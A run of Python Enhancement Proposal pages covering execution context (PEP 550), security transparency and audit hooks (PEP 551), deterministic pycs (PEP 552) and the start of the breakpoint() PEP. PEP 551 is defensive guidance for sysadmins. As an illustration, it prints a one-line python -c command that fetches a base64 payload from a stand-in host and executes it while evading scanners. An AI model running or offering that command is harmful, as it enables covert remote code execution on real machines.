On the other hand, generators are managed by the Python interpreter
directly, and so their context must also be managed by the
interpreter.
Furthermore, execution context cannot be implemented in a third-party
module at all, otherwise the standard library, including decimal
would not be able to rely on it.
Should we update sys.displayhook and other APIs to use EC?
APIs like redirecting stdout by overwriting sys.stdout, or
specifying new exception display hooks by overwriting the
sys.displayhook function are affecting the whole Python process
by design. Their users assume that the effect of changing
them will be visible across OS threads. Therefore, we cannot
just make these APIs to use the new Execution Context.
That said we think it is possible to design new APIs that will
be context aware, but that is outside of the scope of this PEP.
Greenlets
Greenlet is an alternative implementation of cooperative
scheduling for Python. Although greenlet package is not part of
CPython, popular frameworks like gevent rely on it, and it is
important that greenlet can be modified to support execution
contexts.
Conceptually, the behaviour of greenlets is very similar to that of
generators, which means that similar changes around greenlet entry
and exit can be done to add support for execution context. This
PEP provides the necessary C APIs to do that.
Context manager as the interface for modifications
This PEP concentrates on the low-level mechanics and the minimal
API that enables fundamental operations with execution context.
For developer convenience, a high-level context manager interface
may be added to the contextvars module. For example:
with contextvars.set_var(var, 'foo'):
# ...
Setting and restoring context variables
The ContextVar.delete() method removes the context variable from
the topmost logical context.
If the variable is not found in the topmost logical context, a
LookupError is raised, similarly to del var raising
NameError when var is not in scope.
This method is useful when there is a (rare) need to correctly restore
the state of a logical context, such as when a nested generator
wants to modify the logical context temporarily:
var = contextvars.ContextVar('var')
def gen():
with some_var_context_manager('gen'):
# EC = [{var: 'main'}, {var: 'gen'}]
assert var.get() == 'gen'
yield
# EC = [{var: 'main modified'}, {}]
assert var.get() == 'main modified'
yield
def main():
var.set('main')
g = gen()
next(g)
var.set('main modified')
next(g)
The above example would work correctly only if there is a way to
delete var from the logical context in gen(). Setting it
to a “previous value” in __exit__() would mask changes made
in main() between the iterations.
Alternative Designs for ContextVar API
Logical Context with stacked values
By the design presented in this PEP, logical context is a simple
LC({ContextVar: value, ...}) mapping. An alternative
representation is to store a stack of values for each context
variable: LC({ContextVar: [val1, val2, ...], ...}).
The ContextVar methods would then be:
get(*, default=None) – traverses the stack
of logical contexts, and returns the top value from the
first non-empty logical context;
push(val) – pushes val onto the stack of values in the
current logical context;
pop() – pops the top value from the stack of values in
the current logical context.
Compared to the single-value design with the set() and
delete() methods, the stack-based approach allows for a simpler
implementation of the set/restore pattern. However, the mental
burden of this approach is considered to be higher, since there
would be two stacks to consider: a stack of LCs and a stack of
values in each LC.
(This idea was suggested by Nathaniel Smith.)
ContextVar “set/reset”
Yet another approach is to return a special object from
ContextVar.set(), which would represent the modification of
the context variable in the current logical context:
var = contextvars.ContextVar('var')
def foo():
mod = var.set('spam')
# ... perform work
mod.reset() # Reset the value of var to the original value
# or remove it from the context.
The critical flaw in this approach is that it becomes possible to
pass context var “modification objects” into code running in a
different execution context, which leads to undefined side effects.
Backwards Compatibility
This proposal preserves 100% backwards compatibility.
Rejected Ideas
Replication of threading.local() interface
Choosing the threading.local()-like interface for context
variables was considered and rejected for the following reasons:
A survey of the standard library and Django has shown that the
vast majority of threading.local() uses involve a single
attribute, which indicates that the namespace approach is not
as helpful in the field.
Using __getattr__() instead of .get() for value lookup
does not provide any way to specify the depth of the lookup
(i.e. search only the top logical context).
Single-value ContextVar is easier to reason about in terms
of visibility. Suppose ContextVar() is a namespace,
and the consider the following:ns = contextvars.ContextVar('ns')
def gen():
ns.a = 2
yield
assert ns.b == 'bar' # ??
def main():
ns.a = 1
ns.b = 'foo'
g = gen()
next(g)
# should not see the ns.a modification in gen()
assert ns.a == 1
# but should gen() see the ns.b modification made here?
ns.b = 'bar'
yield
The above example demonstrates that reasoning about the visibility
of different attributes of the same context var is not trivial.
Single-value ContextVar allows straightforward implementation
of the lookup cache;
Single-value ContextVar interface allows the C-API to be
simple and essentially the same as the Python API.
See also the mailing list discussion: [26], [27].
Coroutines not leaking context changes by default
In V4 (Version History) of this PEP, coroutines were considered to
behave exactly like generators with respect to the execution context:
changes in awaited coroutines were not visible in the outer coroutine.
This idea was rejected on the grounds that is breaks the semantic
similarity of the task and thread models, and, more specifically,
makes it impossible to reliably implement asynchronous context
managers that modify context vars, since __aenter__ is a
coroutine.
Appendix: HAMT Performance Analysis
Figure 1. Benchmark code can be found here: [9].
The above chart demonstrates that:
HAMT displays near O(1) performance for all benchmarked
dictionary sizes.
dict.copy() becomes very slow around 100 items.
Figure 2. Benchmark code can be found here: [10].
Figure 2 compares the lookup costs of dict versus a HAMT-based
immutable mapping. HAMT lookup time is 30-40% slower than Python dict
lookups on average, which is a very good result, considering that the
latter is very well optimized.
There is research [8] showing that there are further possible
improvements to the performance of HAMT.
The reference implementation of HAMT for CPython can be found here:
[7].
Acknowledgments
Thanks to Victor Petrovykh for countless discussions around the topic
and PEP proofreading and edits.
Thanks to Nathaniel Smith for proposing the ContextVar design
[17] [18], for pushing the PEP towards a more complete design, and
coming up with the idea of having a stack of contexts in the thread
state.
Thanks to Alyssa (Nick) Coghlan for numerous suggestions and ideas on the
mailing list, and for coming up with a case that cause the complete
rewrite of the initial PEP version [19].
Version History
Initial revision, posted on 11-Aug-2017 [20].
V2 posted on 15-Aug-2017 [21].The fundamental limitation that caused a complete redesign of the
first version was that it was not possible to implement an iterator
that would interact with the EC in the same way as generators
(see [19].)
Version 2 was a complete rewrite, introducing new terminology
(Local Context, Execution Context, Context Item) and new APIs.
V3 posted on 18-Aug-2017 [22].Updates:
Local Context was renamed to Logical Context. The term “local”
was ambiguous and conflicted with local name scopes.
Context Item was renamed to Context Key, see the thread with Alyssa
Coghlan, Stefan Krah, and Yury Selivanov [23] for details.
Context Item get cache design was adjusted, per Nathaniel Smith’s
idea in [25].
Coroutines are created without a Logical Context; ceval loop
no longer needs to special case the await expression
(proposed by Alyssa Coghlan in [24].)
V4 posted on 25-Aug-2017 [31].
The specification section has been completely rewritten.
Coroutines now have their own Logical Context. This means
there is no difference between coroutines, generators, and
asynchronous generators w.r.t. interaction with the Execution
Context.
Context Key renamed to Context Var.
Removed the distinction between generators and coroutines with
respect to logical context isolation.
V5 posted on 01-Sep-2017: the current version.
Coroutines have no logical context by default (a revert to the V3
semantics). Read about the motivation in the
Coroutines not leaking context changes by default section.The High-Level Specification section was also updated
(specifically Generators and Coroutines subsections).
All APIs have been placed to the contextvars module, and
the factory functions were changed to class constructors
(ContextVar, ExecutionContext, and LogicalContext).
Thanks to Alyssa for the idea [33].
ContextVar.lookup() got renamed back to ContextVar.get()
and gained the topmost and default keyword arguments.
Added ContextVar.delete().See Guido’s comment in [32].
New ExecutionContext.vars() method. Read about it in
the Enumerating context vars section.
Fixed ContextVar.get() cache bug (thanks Nathaniel!).
New Rejected Ideas,
Should “yield from” leak context changes?,
Alternative Designs for ContextVar API,
Setting and restoring context variables, and
Context manager as the interface for modifications sections.
References
[1]
https://go.dev/blog/context
[2]
https://docs.microsoft.com/en-us/dotnet/api/system.threading.executioncontext
[3]
https://github.com/numpy/numpy/issues/9444
[5]
https://en.wikipedia.org/wiki/Hash_array_mapped_trie
[6]
https://blog.higher-order.net/2010/08/16/assoc-and-clojures-persistenthashmap-part-ii.html
[7]
https://github.com/1st1/cpython/tree/hamt
[8]
https://michael.steindorfer.name/publications/oopsla15.pdf
[9]
https://gist.github.com/1st1/9004813d5576c96529527d44c5457dcd
[10]
https://gist.github.com/1st1/dbe27f2e14c30cce6f0b5fddfc8c437e
[17]
https://mail.python.org/pipermail/python-ideas/2017-August/046752.html
[18]
https://mail.python.org/pipermail/python-ideas/2017-August/046772.html
[19] (1, 2)
https://mail.python.org/pipermail/python-ideas/2017-August/046775.html
[20]
https://github.com/python/peps/blob/e8a06c9a790f39451d9e99e203b13b3ad73a1d01/pep-0550.rst
[21]
https://github.com/python/peps/blob/e3aa3b2b4e4e9967d28a10827eed1e9e5960c175/pep-0550.rst
[22]
https://github.com/python/peps/blob/287ed87bb475a7da657f950b353c71c1248f67e7/pep-0550.rst
[23]
https://mail.python.org/pipermail/python-ideas/2017-August/046801.html
[24]
https://mail.python.org/pipermail/python-ideas/2017-August/046790.html
[25]
https://mail.python.org/pipermail/python-ideas/2017-August/046786.html
[26]
https://mail.python.org/pipermail/python-ideas/2017-August/046888.html
[27]
https://mail.python.org/pipermail/python-ideas/2017-August/046889.html
[28]
https://docs.python.org/3/library/decimal.html#decimal.Context.abs
[29]
https://web.archive.org/web/20170706074739/https://curio.readthedocs.io/en/latest/reference.html#task-local-storage
[30]
https://docs.atlassian.com/aiolocals/latest/usage.html
[31]
https://github.com/python/peps/blob/1b8728ded7cde9df0f9a24268574907fafec6d5e/pep-0550.rst
[32]
https://mail.python.org/pipermail/python-dev/2017-August/149020.html
[33]
https://mail.python.org/pipermail/python-dev/2017-August/149043.html
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 550 – Execution Context | Standards Track | This PEP adds a new generic mechanism of ensuring consistent access
to non-local state in the context of out-of-order execution, such
as in Python generators and coroutines. |
PEP 551 – Security transparency in the Python runtime
Author:
Steve Dower <steve.dower at python.org>
Status:
Withdrawn
Type:
Informational
Created:
23-Aug-2017
Python-Version:
3.7
Post-History:
24-Aug-2017, 28-Aug-2017
Table of Contents
Relationship to PEP 578
Abstract
Background
Summary Recommendations
Restricting the Entry Point
General Recommendations
Things not to do
Further Reading
References
Acknowledgments
Copyright
Note
This PEP has been withdrawn. For information about integrated
CPython into a secure environment, we recommend consulting your own
security experts.
Relationship to PEP 578
This PEP has been split into two since its original posting.
See PEP 578 for the
auditing APIs proposed for addition to the next version of Python.
This is now an informational PEP, providing guidance to those planning
to integrate Python into their secure or audited environments.
Abstract
This PEP describes the concept of security transparency and how it
applies to the Python runtime. Visibility into actions taken by the
runtime is invaluable in integrating Python into an otherwise secure
and/or monitored environment.
The audit hooks described in PEP 578 are an essential component in
detecting, identifying and analyzing misuse of Python. While the hooks
themselves are neutral (in that not every reported event is inherently
misuse), they provide essential context to those who are responsible
for monitoring an overall system or network. With enough transparency,
attackers are no longer able to hide.
Background
Software vulnerabilities are generally seen as bugs that enable remote
or elevated code execution. However, in our modern connected world, the
more dangerous vulnerabilities are those that enable advanced persistent
threats (APTs). APTs are achieved when an attacker is able to penetrate
a network, establish their software on one or more machines, and over
time extract data or intelligence. Some APTs may make themselves known
by maliciously damaging data (e.g., WannaCrypt)
or hardware (e.g., Stuxnet).
Most attempt to hide their existence and avoid detection. APTs often use
a combination of traditional vulnerabilities, social engineering,
phishing (or spear-phishing), thorough network analysis, and an
understanding of misconfigured environments to establish themselves and
do their work.
The first infected machines may not be the final target and may not
require special privileges. For example, an APT that is established as a
non-administrative user on a developer’s machine may have the ability to
spread to production machines through normal deployment channels. It is
common for APTs to persist on as many machines as possible, with sheer
weight of presence making them difficult to remove completely.
Whether an attacker is seeking to cause direct harm or hide their
tracks, the biggest barrier to detection is a lack of insight. System
administrators with large networks rely on distributed logs to
understand what their machines are doing, but logs are often filtered to
show only error conditions. APTs that are attempting to avoid detection
will rarely generate errors or abnormal events. Reviewing normal
operation logs involves a significant amount of effort, though work is
underway by a number of companies to enable automatic anomaly detection
within operational logs. The tools preferred by attackers are ones that
are already installed on the target machines, since log messages from
these tools are often expected and ignored in normal use.
At this point, we are not going to spend further time discussing the
existence of APTs or methods and mitigations that do not apply to this
PEP. For further information about the field, we recommend reading or
watching the resources listed under Further Reading.
Python is a particularly interesting tool for attackers due to its
prevalence on server and developer machines, its ability to execute
arbitrary code provided as data (as opposed to native binaries), and its
complete lack of internal auditing. This allows attackers to download,
decrypt, and execute malicious code with a single command:
python -c "import urllib.request, base64;
exec(base64.b64decode(
urllib.request.urlopen('http://my-exploit/py.b64')
).decode())"
This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being
written to disk (base64 is often sufficient to bypass these checks). It
also bypasses protections such as file access control lists or
permissions (no file access occurs), approved application lists
(assuming Python has been approved for other uses), and automated
auditing or logging (assuming Python is allowed to access the internet
or access another machine on the local network from which to obtain its
payload).
General consensus among the security community is that totally
preventing attacks is infeasible and defenders should assume that they
will often detect attacks only after they have succeeded. This is known
as the “assume breach” mindset. [1] In this scenario, protections such
as sandboxing and input validation have already failed, and the
important task is detection, tracking, and eventual removal of the
malicious code. To this end, the primary feature required from Python is
security transparency: the ability to see what operations the Python
runtime is performing that may indicate anomalous or malicious use.
Preventing such use is valuable, but secondary to the need to know that
it is occurring.
To summarise the goals in order of increasing importance:
preventing malicious use is valuable
detecting malicious use is important
detecting attempts to bypass detection is critical
One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]
Generally, application and system configuration will determine which
events within a scripting engine are worth logging. However, given the
value of many logs events are not recognized until after an attack is
detected, it is important to capture as much as possible and filter
views rather than filtering at the source (see the No Easy Breach video
from Further Reading). Events that are always of interest include
attempts to bypass auditing, attempts to load and execute code that is
not correctly signed or access-controlled, use of uncommon operating
system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create
and hide files or configuration settings on the local machine.
To summarize, defenders have a need to audit specific uses of Python in
order to detect abnormal or malicious usage. With PEP 578, the Python
runtime gains the ability to provide this. The aim of this PEP is to
assist system administrators with deploying a security transparent
version of Python that can integrate with their existing auditing and
protection systems.
On Windows, some specific features that may be integrated through the
hooks added by PEP 578 include:
Script Block Logging [3]
DeviceGuard [4]
AMSI [5]
Persistent Zone Identifiers [6]
Event tracing (which includes event forwarding) [7]
On Linux, some specific features that may be integrated are:
gnupg [8]
sd_journal [9]
OpenBSM [10]
syslog [11]
auditd [12]
SELinux labels [13]
check execute bit on imported modules
On macOS, some features that may be integrated are:
OpenBSM [10]
syslog [11]
Overall, the ability to enable these platform-specific features on
production machines is highly appealing to system administrators and
will make Python a more trustworthy dependency for application
developers.
True security transparency is not fully achievable by Python in
isolation. The runtime can audit as many events as it likes, but unless
the logs are reviewed and analyzed there is no value. Python may impose
restrictions in the name of security, but usability may suffer.
Different platforms and environments will require different
implementations of certain security features, and organizations with the
resources to fully customize their runtime should be encouraged to do
so.
Summary Recommendations
These are discussed in greater detail in later sections, but are
presented here to frame the overall discussion.
Sysadmins should provide and use an alternate entry point (besides
python.exe or pythonX.Y) in order to reduce surface area and
securely enable audit hooks. A discussion of what could be restricted
is below in Restricting the Entry Point.
Sysadmins should use all available measures provided by their operating
system to prevent modifications to their Python installation, such as
file permissions, access control lists and signature validation.
Sysadmins should log everything and collect logs to a central location
as quickly as possible - avoid keeping logs on outer-ring machines.
Sysadmins should prioritize _detection_ of misuse over _prevention_ of
misuse.
Restricting the Entry Point
One of the primary vulnerabilities exposed by the presence of Python
on a machine is the ability to execute arbitrary code without
detection or verification by the system. This is made significantly
easier because the default entry point (python.exe on Windows and
pythonX.Y on other platforms) allows execution from the command
line, from standard input, and does not have any hooks enabled by
default.
Our recommendation is that production machines should use a modified
entry point instead of the default. Once outside of the development
environment, there is rarely a need for the flexibility offered by the
default entry point.
In this section, we describe a hypothetical spython entry point
(spython.exe on Windows; spythonX.Y on other platforms) that
provides a level of security transparency recommended for production
machines. An associated example implementation shows many of the
features described here, though with a number of concessions for the
sake of avoiding platform-specific code. A sufficient implementation
will inherently require some integration with platform-specific
security features.
Official distributions will not include any spython by default, but
third party distributions may include appropriately modified entry
points that use the same name.
Remove most command-line arguments
The spython entry point requires a script file be passed as the
first argument, and does not allow any options to precede it. This
prevents arbitrary code execution from in-memory data or non-script
files (such as pickles, which could be executed using
-m pickle <path>.
Options -B (do not write bytecode), -E (ignore environment
variables) and -s (no user site) are assumed.
If a file with the same full path as the process with a ._pth suffix
(spython._pth on Windows, spythonX.Y._pth on Linux) exists, it
will be used to initialize sys.path following the rules currently
described for Windows.
For the sake of demonstration, the example implementation of
spython also allows the -i option to start in interactive mode.
This is not recommended for restricted entry points.
Log audited events
Before initialization, spython sets an audit hook that writes all
audited events to an OS-managed log file. On Windows, this is the Event
Tracing functionality,[7]_ and on other platforms they go to
syslog.[11]_ Logs are copied from the machine as frequently as possible
to prevent loss of information should an attacker attempt to clear
local logs or prevent legitimate access to the machine.
The audit hook will also abort all sys.addaudithook events,
preventing any other hooks from being added.
The logging hook is written in native code and configured before the
interpreter is initialized. This is the only opportunity to ensure that
no Python code executes without auditing, and that Python code cannot
prevent registration of the hook.
Our primary aim is to record all actions taken by all Python processes,
so that detection may be performed offline against logged events.
Having all events recorded also allows for deeper analysis and the use
of machine learning algorithms. These are useful for detecting
persistent attacks, where the attacker is intending to remain within
the protected machines for some period of time, as well as for later
analysis to determine the impact and exposure caused by a successful
attack.
The example implementation of spython writes to a log file on the
local machine, for the sake of demonstration. When started with -i,
the example implementation writes all audit events to standard error
instead of the log file. The SPYTHONLOG environment variable can be
used to specify the log file location.
Restrict importable modules
Also before initialization, spython sets an open-for-import hook
that validates all files opened with os.open_for_import. This
implementation requires all files to have a .py suffix (preventing
the use of cached bytecode), and will raise a custom audit event
spython.open_for_import containing (filename, True_if_allowed).
After opening the file, the entire contents is read into memory in a
single buffer and the file is closed.
Compilation will later trigger a compile event, so there is no need
to validate the contents now using mechanisms that also apply to
dynamically generated code. However, if a whitelist of source files or
file hashes is available, then other validation mechanisms such as
DeviceGuard [4] should be performed here.
Restrict globals in pickles
The spython entry point will abort all pickle.find_class events
that use the default implementation. Overrides will not raise audit
events unless explicitly added, and so they will continue to be allowed.
Prevent os.system
The spython entry point aborts all os.system calls.
It should be noted here that subprocess.Popen(shell=True) is
allowed (though logged via the platform-specific process creation
events). This tradeoff is made because it is much simpler to induce a
running application to call os.system with a single string argument
than a function with multiple arguments, and so it is more likely to be
used as part of an exploit. There is also little justification for
using os.system in production code, while subprocess.Popen has
a large number of legitimate uses. Though logs indicating the use of
the shell=True argument should be more carefully scrutinised.
Sysadmins are encouraged to make these kinds of tradeoffs between
restriction and detection, and generally should prefer detection.
General Recommendations
Recommendations beyond those suggested in the previous section are
difficult, as the ideal configuration for any environment depends on
the sysadmin’s ability to manage, monitor, and respond to activity on
their own network. Nonetheless, here we attempt to provide some context
and guidance for integrating Python into a complete system.
This section provides recommendations using the terms should (or
should not), indicating that we consider it risky to ignore the
advice, and may, indicating that for the advice ought to be
considered for high value systems. The term sysadmin refers to
whoever is responsible for deploying Python throughout the network;
different organizations may have an alternative title for the
responsible people.
Sysadmins should build their own entry point, likely starting from
the spython source, and directly interface with the security systems
available in their environment. The more tightly integrated, the less
likely a vulnerability will be found allowing an attacker to bypass
those systems. In particular, the entry point should not obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.
Audit messages should not be written to a local file. The
spython entry point does this for example and testing purposes. On
production machines, tools such as ETW [7] or auditd [12] that are
intended for this purpose should be used.
The default python entry point should not be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins may consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.
Sysadmins may deploy their own entry point as python to obscure
the fact that extra auditing is being included.
Python deployments should be made read-only using any available
platform functionality after deployment and during use.
On platforms that support it, sysadmins should include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
[4] to validate signatures either automatically or using an
open_for_import hook.
Sysadmins should log as many audited events as possible, and
should copy logs off of local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable auditing. Audit hooks should
not attempt to preemptively filter events, as even benign events are
useful when analyzing the progress of an attack. (Watch the “No Easy
Breach” video under Further Reading for a deeper look at this side of
things.)
Most actions should not be aborted if they could ever occur during
normal use or if preventing them will encourage attackers to work around
them. As described earlier, awareness is a higher priority than
prevention. Sysadmins may audit their Python code and abort
operations that are known to never be used deliberately.
Audit hooks should write events to logs before attempting to abort.
As discussed earlier, it is more important to record malicious actions
than to prevent them.
Sysadmins should identify correlations between events, as a change
to correlated events may indicate misuse. For example, module imports
will typically trigger the import auditing event, followed by an
open_for_import call and usually a compile event. Attempts to
bypass auditing will often suppress some but not all of these events. So
if the log contains import events but not compile events,
investigation may be necessary.
The first audit hook should be set in C code before
Py_Initialize is called, and that hook should unconditionally
abort the sys.addloghook event. The Python interface is primarily
intended for testing and development.
To prevent audit hooks being added on non-production machines, an entry
point may add an audit hook that aborts the sys.addloghook event
but otherwise does nothing.
On production machines, a non-validating open_for_import hook
may be set in C code before Py_Initialize is called. This
prevents later code from overriding the hook, however, logging the
setopenforexecutehandler event is useful since no code should ever
need to call it. Using at least the sample open_for_import hook
implementation from spython is recommended.
Since importlib’s use of open_for_import may be easily bypassed
with monkeypatching, an audit hook should be used to detect
attribute changes on type objects.
Things not to do
This section discusses common or “obviously good” recommendations that
we are specifically not making. These range from useless or incorrect
through to ideas that are simply not feasible in any real world
environment.
Do not attempt to implement a sandbox within the Python runtime.
There is a long history of attempts to allow arbitrary code limited use
of Python features (such as [14]), but no general success. The best
options are to run unrestricted Python within a sandboxed environment
with at least hypervisor-level isolation, or to prevent unauthorised
code from starting at all.
Do not rely on static analysis to verify untrusted code before use.
The best options are to pre-authorise trusted code, such as with code
signing, and if not possible to identify known-bad code, such as with
an anti-malware scanner.
Do not use audit hooks to abort operations without logging the
event first. You will regret not knowing why your process disappeared.
[TODO - more bad advice]
Further Reading
Redefining Malware: When Old Terms Pose New ThreatsBy Aviv Raff for SecurityWeek, 29th January 2014This article, and those linked by it, are high-level summaries of the rise of
APTs and the differences from “traditional” malware.
http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats
Anatomy of a Cyber AttackBy FireEye, accessed 23rd August 2017A summary of the techniques used by APTs, and links to a number of relevant
whitepapers.
https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html
Automated Traffic Log Analysis: A Must Have for Advanced Threat ProtectionBy Aviv Raff for SecurityWeek, 8th May 2014High-level summary of the value of detailed logging and automatic analysis.
http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection
No Easy Breach: Challenges and Lessons Learned from an Epic InvestigationVideo presented by Matt Dunwoody and Nick Carr for Mandiant at SchmooCon 2016Detailed walkthrough of the processes and tools used in detecting and removing
an APT.
https://archive.org/details/No_Easy_Breach
Disrupting Nation State HackersVideo presented by Rob Joyce for the NSA at USENIX Enigma 2016Good security practices, capabilities and recommendations from the chief of
NSA’s Tailored Access Operation.
https://www.youtube.com/watch?v=bDJb8WOJYdA
References
[1]
Assume Breach Mindset, http://asian-power.com/node/11144
[2]
PowerShell Loves the Blue Team, also known as Scripting Security and
Protection Advances in Windows 10, https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
[3]
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
[4] (1, 2, 3)
https://aka.ms/deviceguard
[5]
Antimalware Scan Interface, https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx
[6]
Persistent Zone Identifiers, https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx
[7] (1, 2)
Event tracing, https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx
[8]
https://www.gnupg.org/
[9]
https://www.systutorials.com/docs/linux/man/3-sd_journal_send/
[10] (1, 2)
http://www.trustedbsd.org/openbsm.html
[11] (1, 2)
https://linux.die.net/man/3/syslog
[12] (1, 2)
http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/
[13]
SELinux access decisions http://man7.org/linux/man-pages/man3/avc_entry_ref_init.3.html
[14]
The failure of pysandbox https://lwn.net/Articles/574215/
Acknowledgments
Thanks to all the people from Microsoft involved in helping make the
Python runtime safer for production use, and especially to James Powell
for doing much of the initial research, analysis and implementation, Lee
Holmes for invaluable insights into the info-sec field and PowerShell’s
responses, and Brett Cannon for the restraining and grounding
discussions.
Copyright
Copyright (c) 2017-2018 by Microsoft Corporation. This material may be
distributed only subject to the terms and conditions set forth in the
Open Publication License, v1.0 or later (the latest version is presently
available at http://www.opencontent.org/openpub/).
| Withdrawn | PEP 551 – Security transparency in the Python runtime | Informational | This PEP describes the concept of security transparency and how it
applies to the Python runtime. Visibility into actions taken by the
runtime is invaluable in integrating Python into an otherwise secure
and/or monitored environment. |
PEP 552 – Deterministic pycs
Author:
Benjamin Peterson <benjamin at python.org>
Status:
Final
Type:
Standards Track
Created:
04-Sep-2017
Python-Version:
3.7
Post-History:
07-Sep-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Specification
References
Credits
Copyright
Abstract
This PEP proposes an extension to the pyc format to make it more deterministic.
Rationale
A reproducible build is one where the same byte-for-byte output is generated
every time the same sources are built—even across different machines (naturally
subject to the requirement that they have rather similar environments
set up). Reproducibility is important for security. It is also a key concept in
content-based build systems such as Bazel, which are most effective when the
output files’ contents are a deterministic function of the input files’
contents.
The current Python pyc format is the marshaled code object of the module
prefixed by a magic number, the source timestamp, and the source file
size. The presence of a source timestamp means that a pyc is not a deterministic
function of the input file’s contents—it also depends on volatile metadata, the
mtime of the source. Thus, pycs are a barrier to proper reproducibility.
Distributors of Python code are currently stuck with the options of
not distributing pycs and losing the caching advantages
distributing pycs and losing reproducibility
carefully giving all Python source files a deterministic timestamp
(see, for example, https://github.com/python/cpython/pull/296)
doing a complicated mixture of 1. and 2. like generating pycs at installation
time
None of these options are very attractive. This PEP proposes allowing the
timestamp to be replaced with a deterministic hash. The current timestamp
invalidation method will remain the default, though. Despite its nondeterminism,
timestamp invalidation works well for many workflows and usecases. The
hash-based pyc format can impose the cost of reading and hashing every source
file, which is more expensive than simply checking timestamps. Thus, for now, we
expect it to be used mainly by distributors and power use cases.
(Note there are other problems [1] [2] we do not
address here that can make pycs non-deterministic.)
Specification
The pyc header currently consists of 3 32-bit words. We will expand it to 4. The
first word will continue to be the magic number, versioning the bytecode and pyc
format. The second word, conceptually the new word, will be a bit field. The
interpretation of the rest of the header and invalidation behavior of the pyc
depends on the contents of the bit field.
If the bit field is 0, the pyc is a traditional timestamp-based pyc. I.e., the
third and forth words will be the timestamp and file size respectively, and
invalidation will be done by comparing the metadata of the source file with that
in the header.
If the lowest bit of the bit field is set, the pyc is a hash-based pyc. We call
the second lowest bit the check_source flag. Following the bit field is a
64-bit hash of the source file. We will use a SipHash with a hardcoded key of
the contents of the source file. Another fast hash like MD5 or BLAKE2 would
also work. We choose SipHash because Python already has a builtin implementation
of it from PEP 456, although an interface that allows picking the SipHash key
must be exposed to Python. Security of the hash is not a concern, though we pass
over completely-broken hashes like MD5 to ease auditing of Python in controlled
environments.
When Python encounters a hash-based pyc, its behavior depends on the setting of
the check_source flag. If the check_source flag is set, Python will
determine the validity of the pyc by hashing the source file and comparing the
hash with the expected hash in the pyc. If the pyc needs to be regenerated, it
will be regenerated as a hash-based pyc again with the check_source flag
set.
For hash-based pycs with the check_source unset, Python will simply load the
pyc without checking the hash of the source file. The expectation in this case
is that some external system (e.g., the local Linux distribution’s package
manager) is responsible for keeping pycs up to date, so Python itself doesn’t
have to check. Even when validation is disabled, the hash field should be set
correctly, so out-of-band consistency checkers can verify the up-to-dateness of
the pyc. Note also that the PEP 3147 edict that pycs without corresponding
source files not be loaded will still be enforced for hash-based pycs.
The programmatic APIs of py_compile and compileall will support
generation of hash-based pycs. Principally, py_compile will define a new
enumeration corresponding to all the available pyc invalidation modules:
class PycInvalidationMode(Enum):
TIMESTAMP
CHECKED_HASH
UNCHECKED_HASH
py_compile.compile, compileall.compile_dir, and
compileall.compile_file will all gain an invalidation_mode parameter,
which accepts a value of the PycInvalidationMode enumeration.
The compileall tool will be extended with a command new option,
--invalidation-mode to generate hash-based pycs with and without the
check_source bit set. --invalidation-mode will be a tristate option
taking values timestamp (the default), checked-hash, and
unchecked-hash corresponding to the values of PycInvalidationMode.
importlib.util will be extended with a source_hash(source) function that
computes the hash used by the pyc writing code for a bytestring source.
Runtime configuration of hash-based pyc invalidation will be facilitated by a
new --check-hash-based-pycs interpreter option. This is a tristate option,
which may take 3 values: default, always, and never. The default
value, default, means the check_source flag in hash-based pycs
determines invalidation as described above. always causes the interpreter to
hash the source file for invalidation regardless of value of check_source
bit. never causes the interpreter to always assume hash-based pycs are
valid. When --check-hash-based-pycs=never is in effect, unchecked hash-based
pycs will be regenerated as unchecked hash-based pycs. Timestamp-based pycs are
unaffected by --check-hash-based-pycs.
References
[1]
http://benno.id.au/blog/2013/01/15/python-determinism
[2]
http://bugzilla.opensuse.org/show_bug.cgi?id=1049186
Credits
The author would like to thank Gregory P. Smith, Christian Heimes, and Steve
Dower for useful conversations on the topic of this PEP.
Copyright
This document has been placed in the public domain.
| Final | PEP 552 – Deterministic pycs | Standards Track | This PEP proposes an extension to the pyc format to make it more deterministic. |
PEP 553 – Built-in breakpoint()
Author:
Barry Warsaw <barry at python.org>
Status:
Final
Type:
Standards Track
Created:
05-Sep-2017
Python-Version:
3.7
Post-History:
05-Sep-2017, 07-Sep-2017, 13-Sep-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Proposal
Environment variable
Implementation
Rejected alternatives
A new keyword
sys.breakpoint()
Version History
References
Copyright
Abstract
This PEP proposes adding a new built-in function called breakpoint() which
enters a Python debugger at the point of the call. Additionally, two new
names are added to the sys module to make the choice of which debugger is
entered configurable.
Rationale
Python has long had a great debugger in its standard library called pdb.
Setting a break point is commonly written like this:
foo()
import pdb; pdb.set_trace()
bar()
Thus after executing foo() and before executing bar(), Python will
enter the debugger. However this idiom has several disadvantages.
It’s a lot to type (27 characters).
It’s easy to typo. The PEP author often mistypes this line, e.g. omitting
the semicolon, or typing a dot instead of an underscore.
It ties debugging directly to the choice of pdb. There might be other
debugging options, say if you’re using an IDE or some other development
environment.
Python linters (e.g. flake8 [linters]) complain about this line because it
contains two statements. Breaking the idiom up into two lines complicates
its use because there are more opportunities for mistakes at clean up time.
I.e. you might forget to delete one of those lines when you no longer need
to debug the code.
Python developers also have many other debuggers to choose from, but
remembering how to invoke them can be problematic. For example, even when
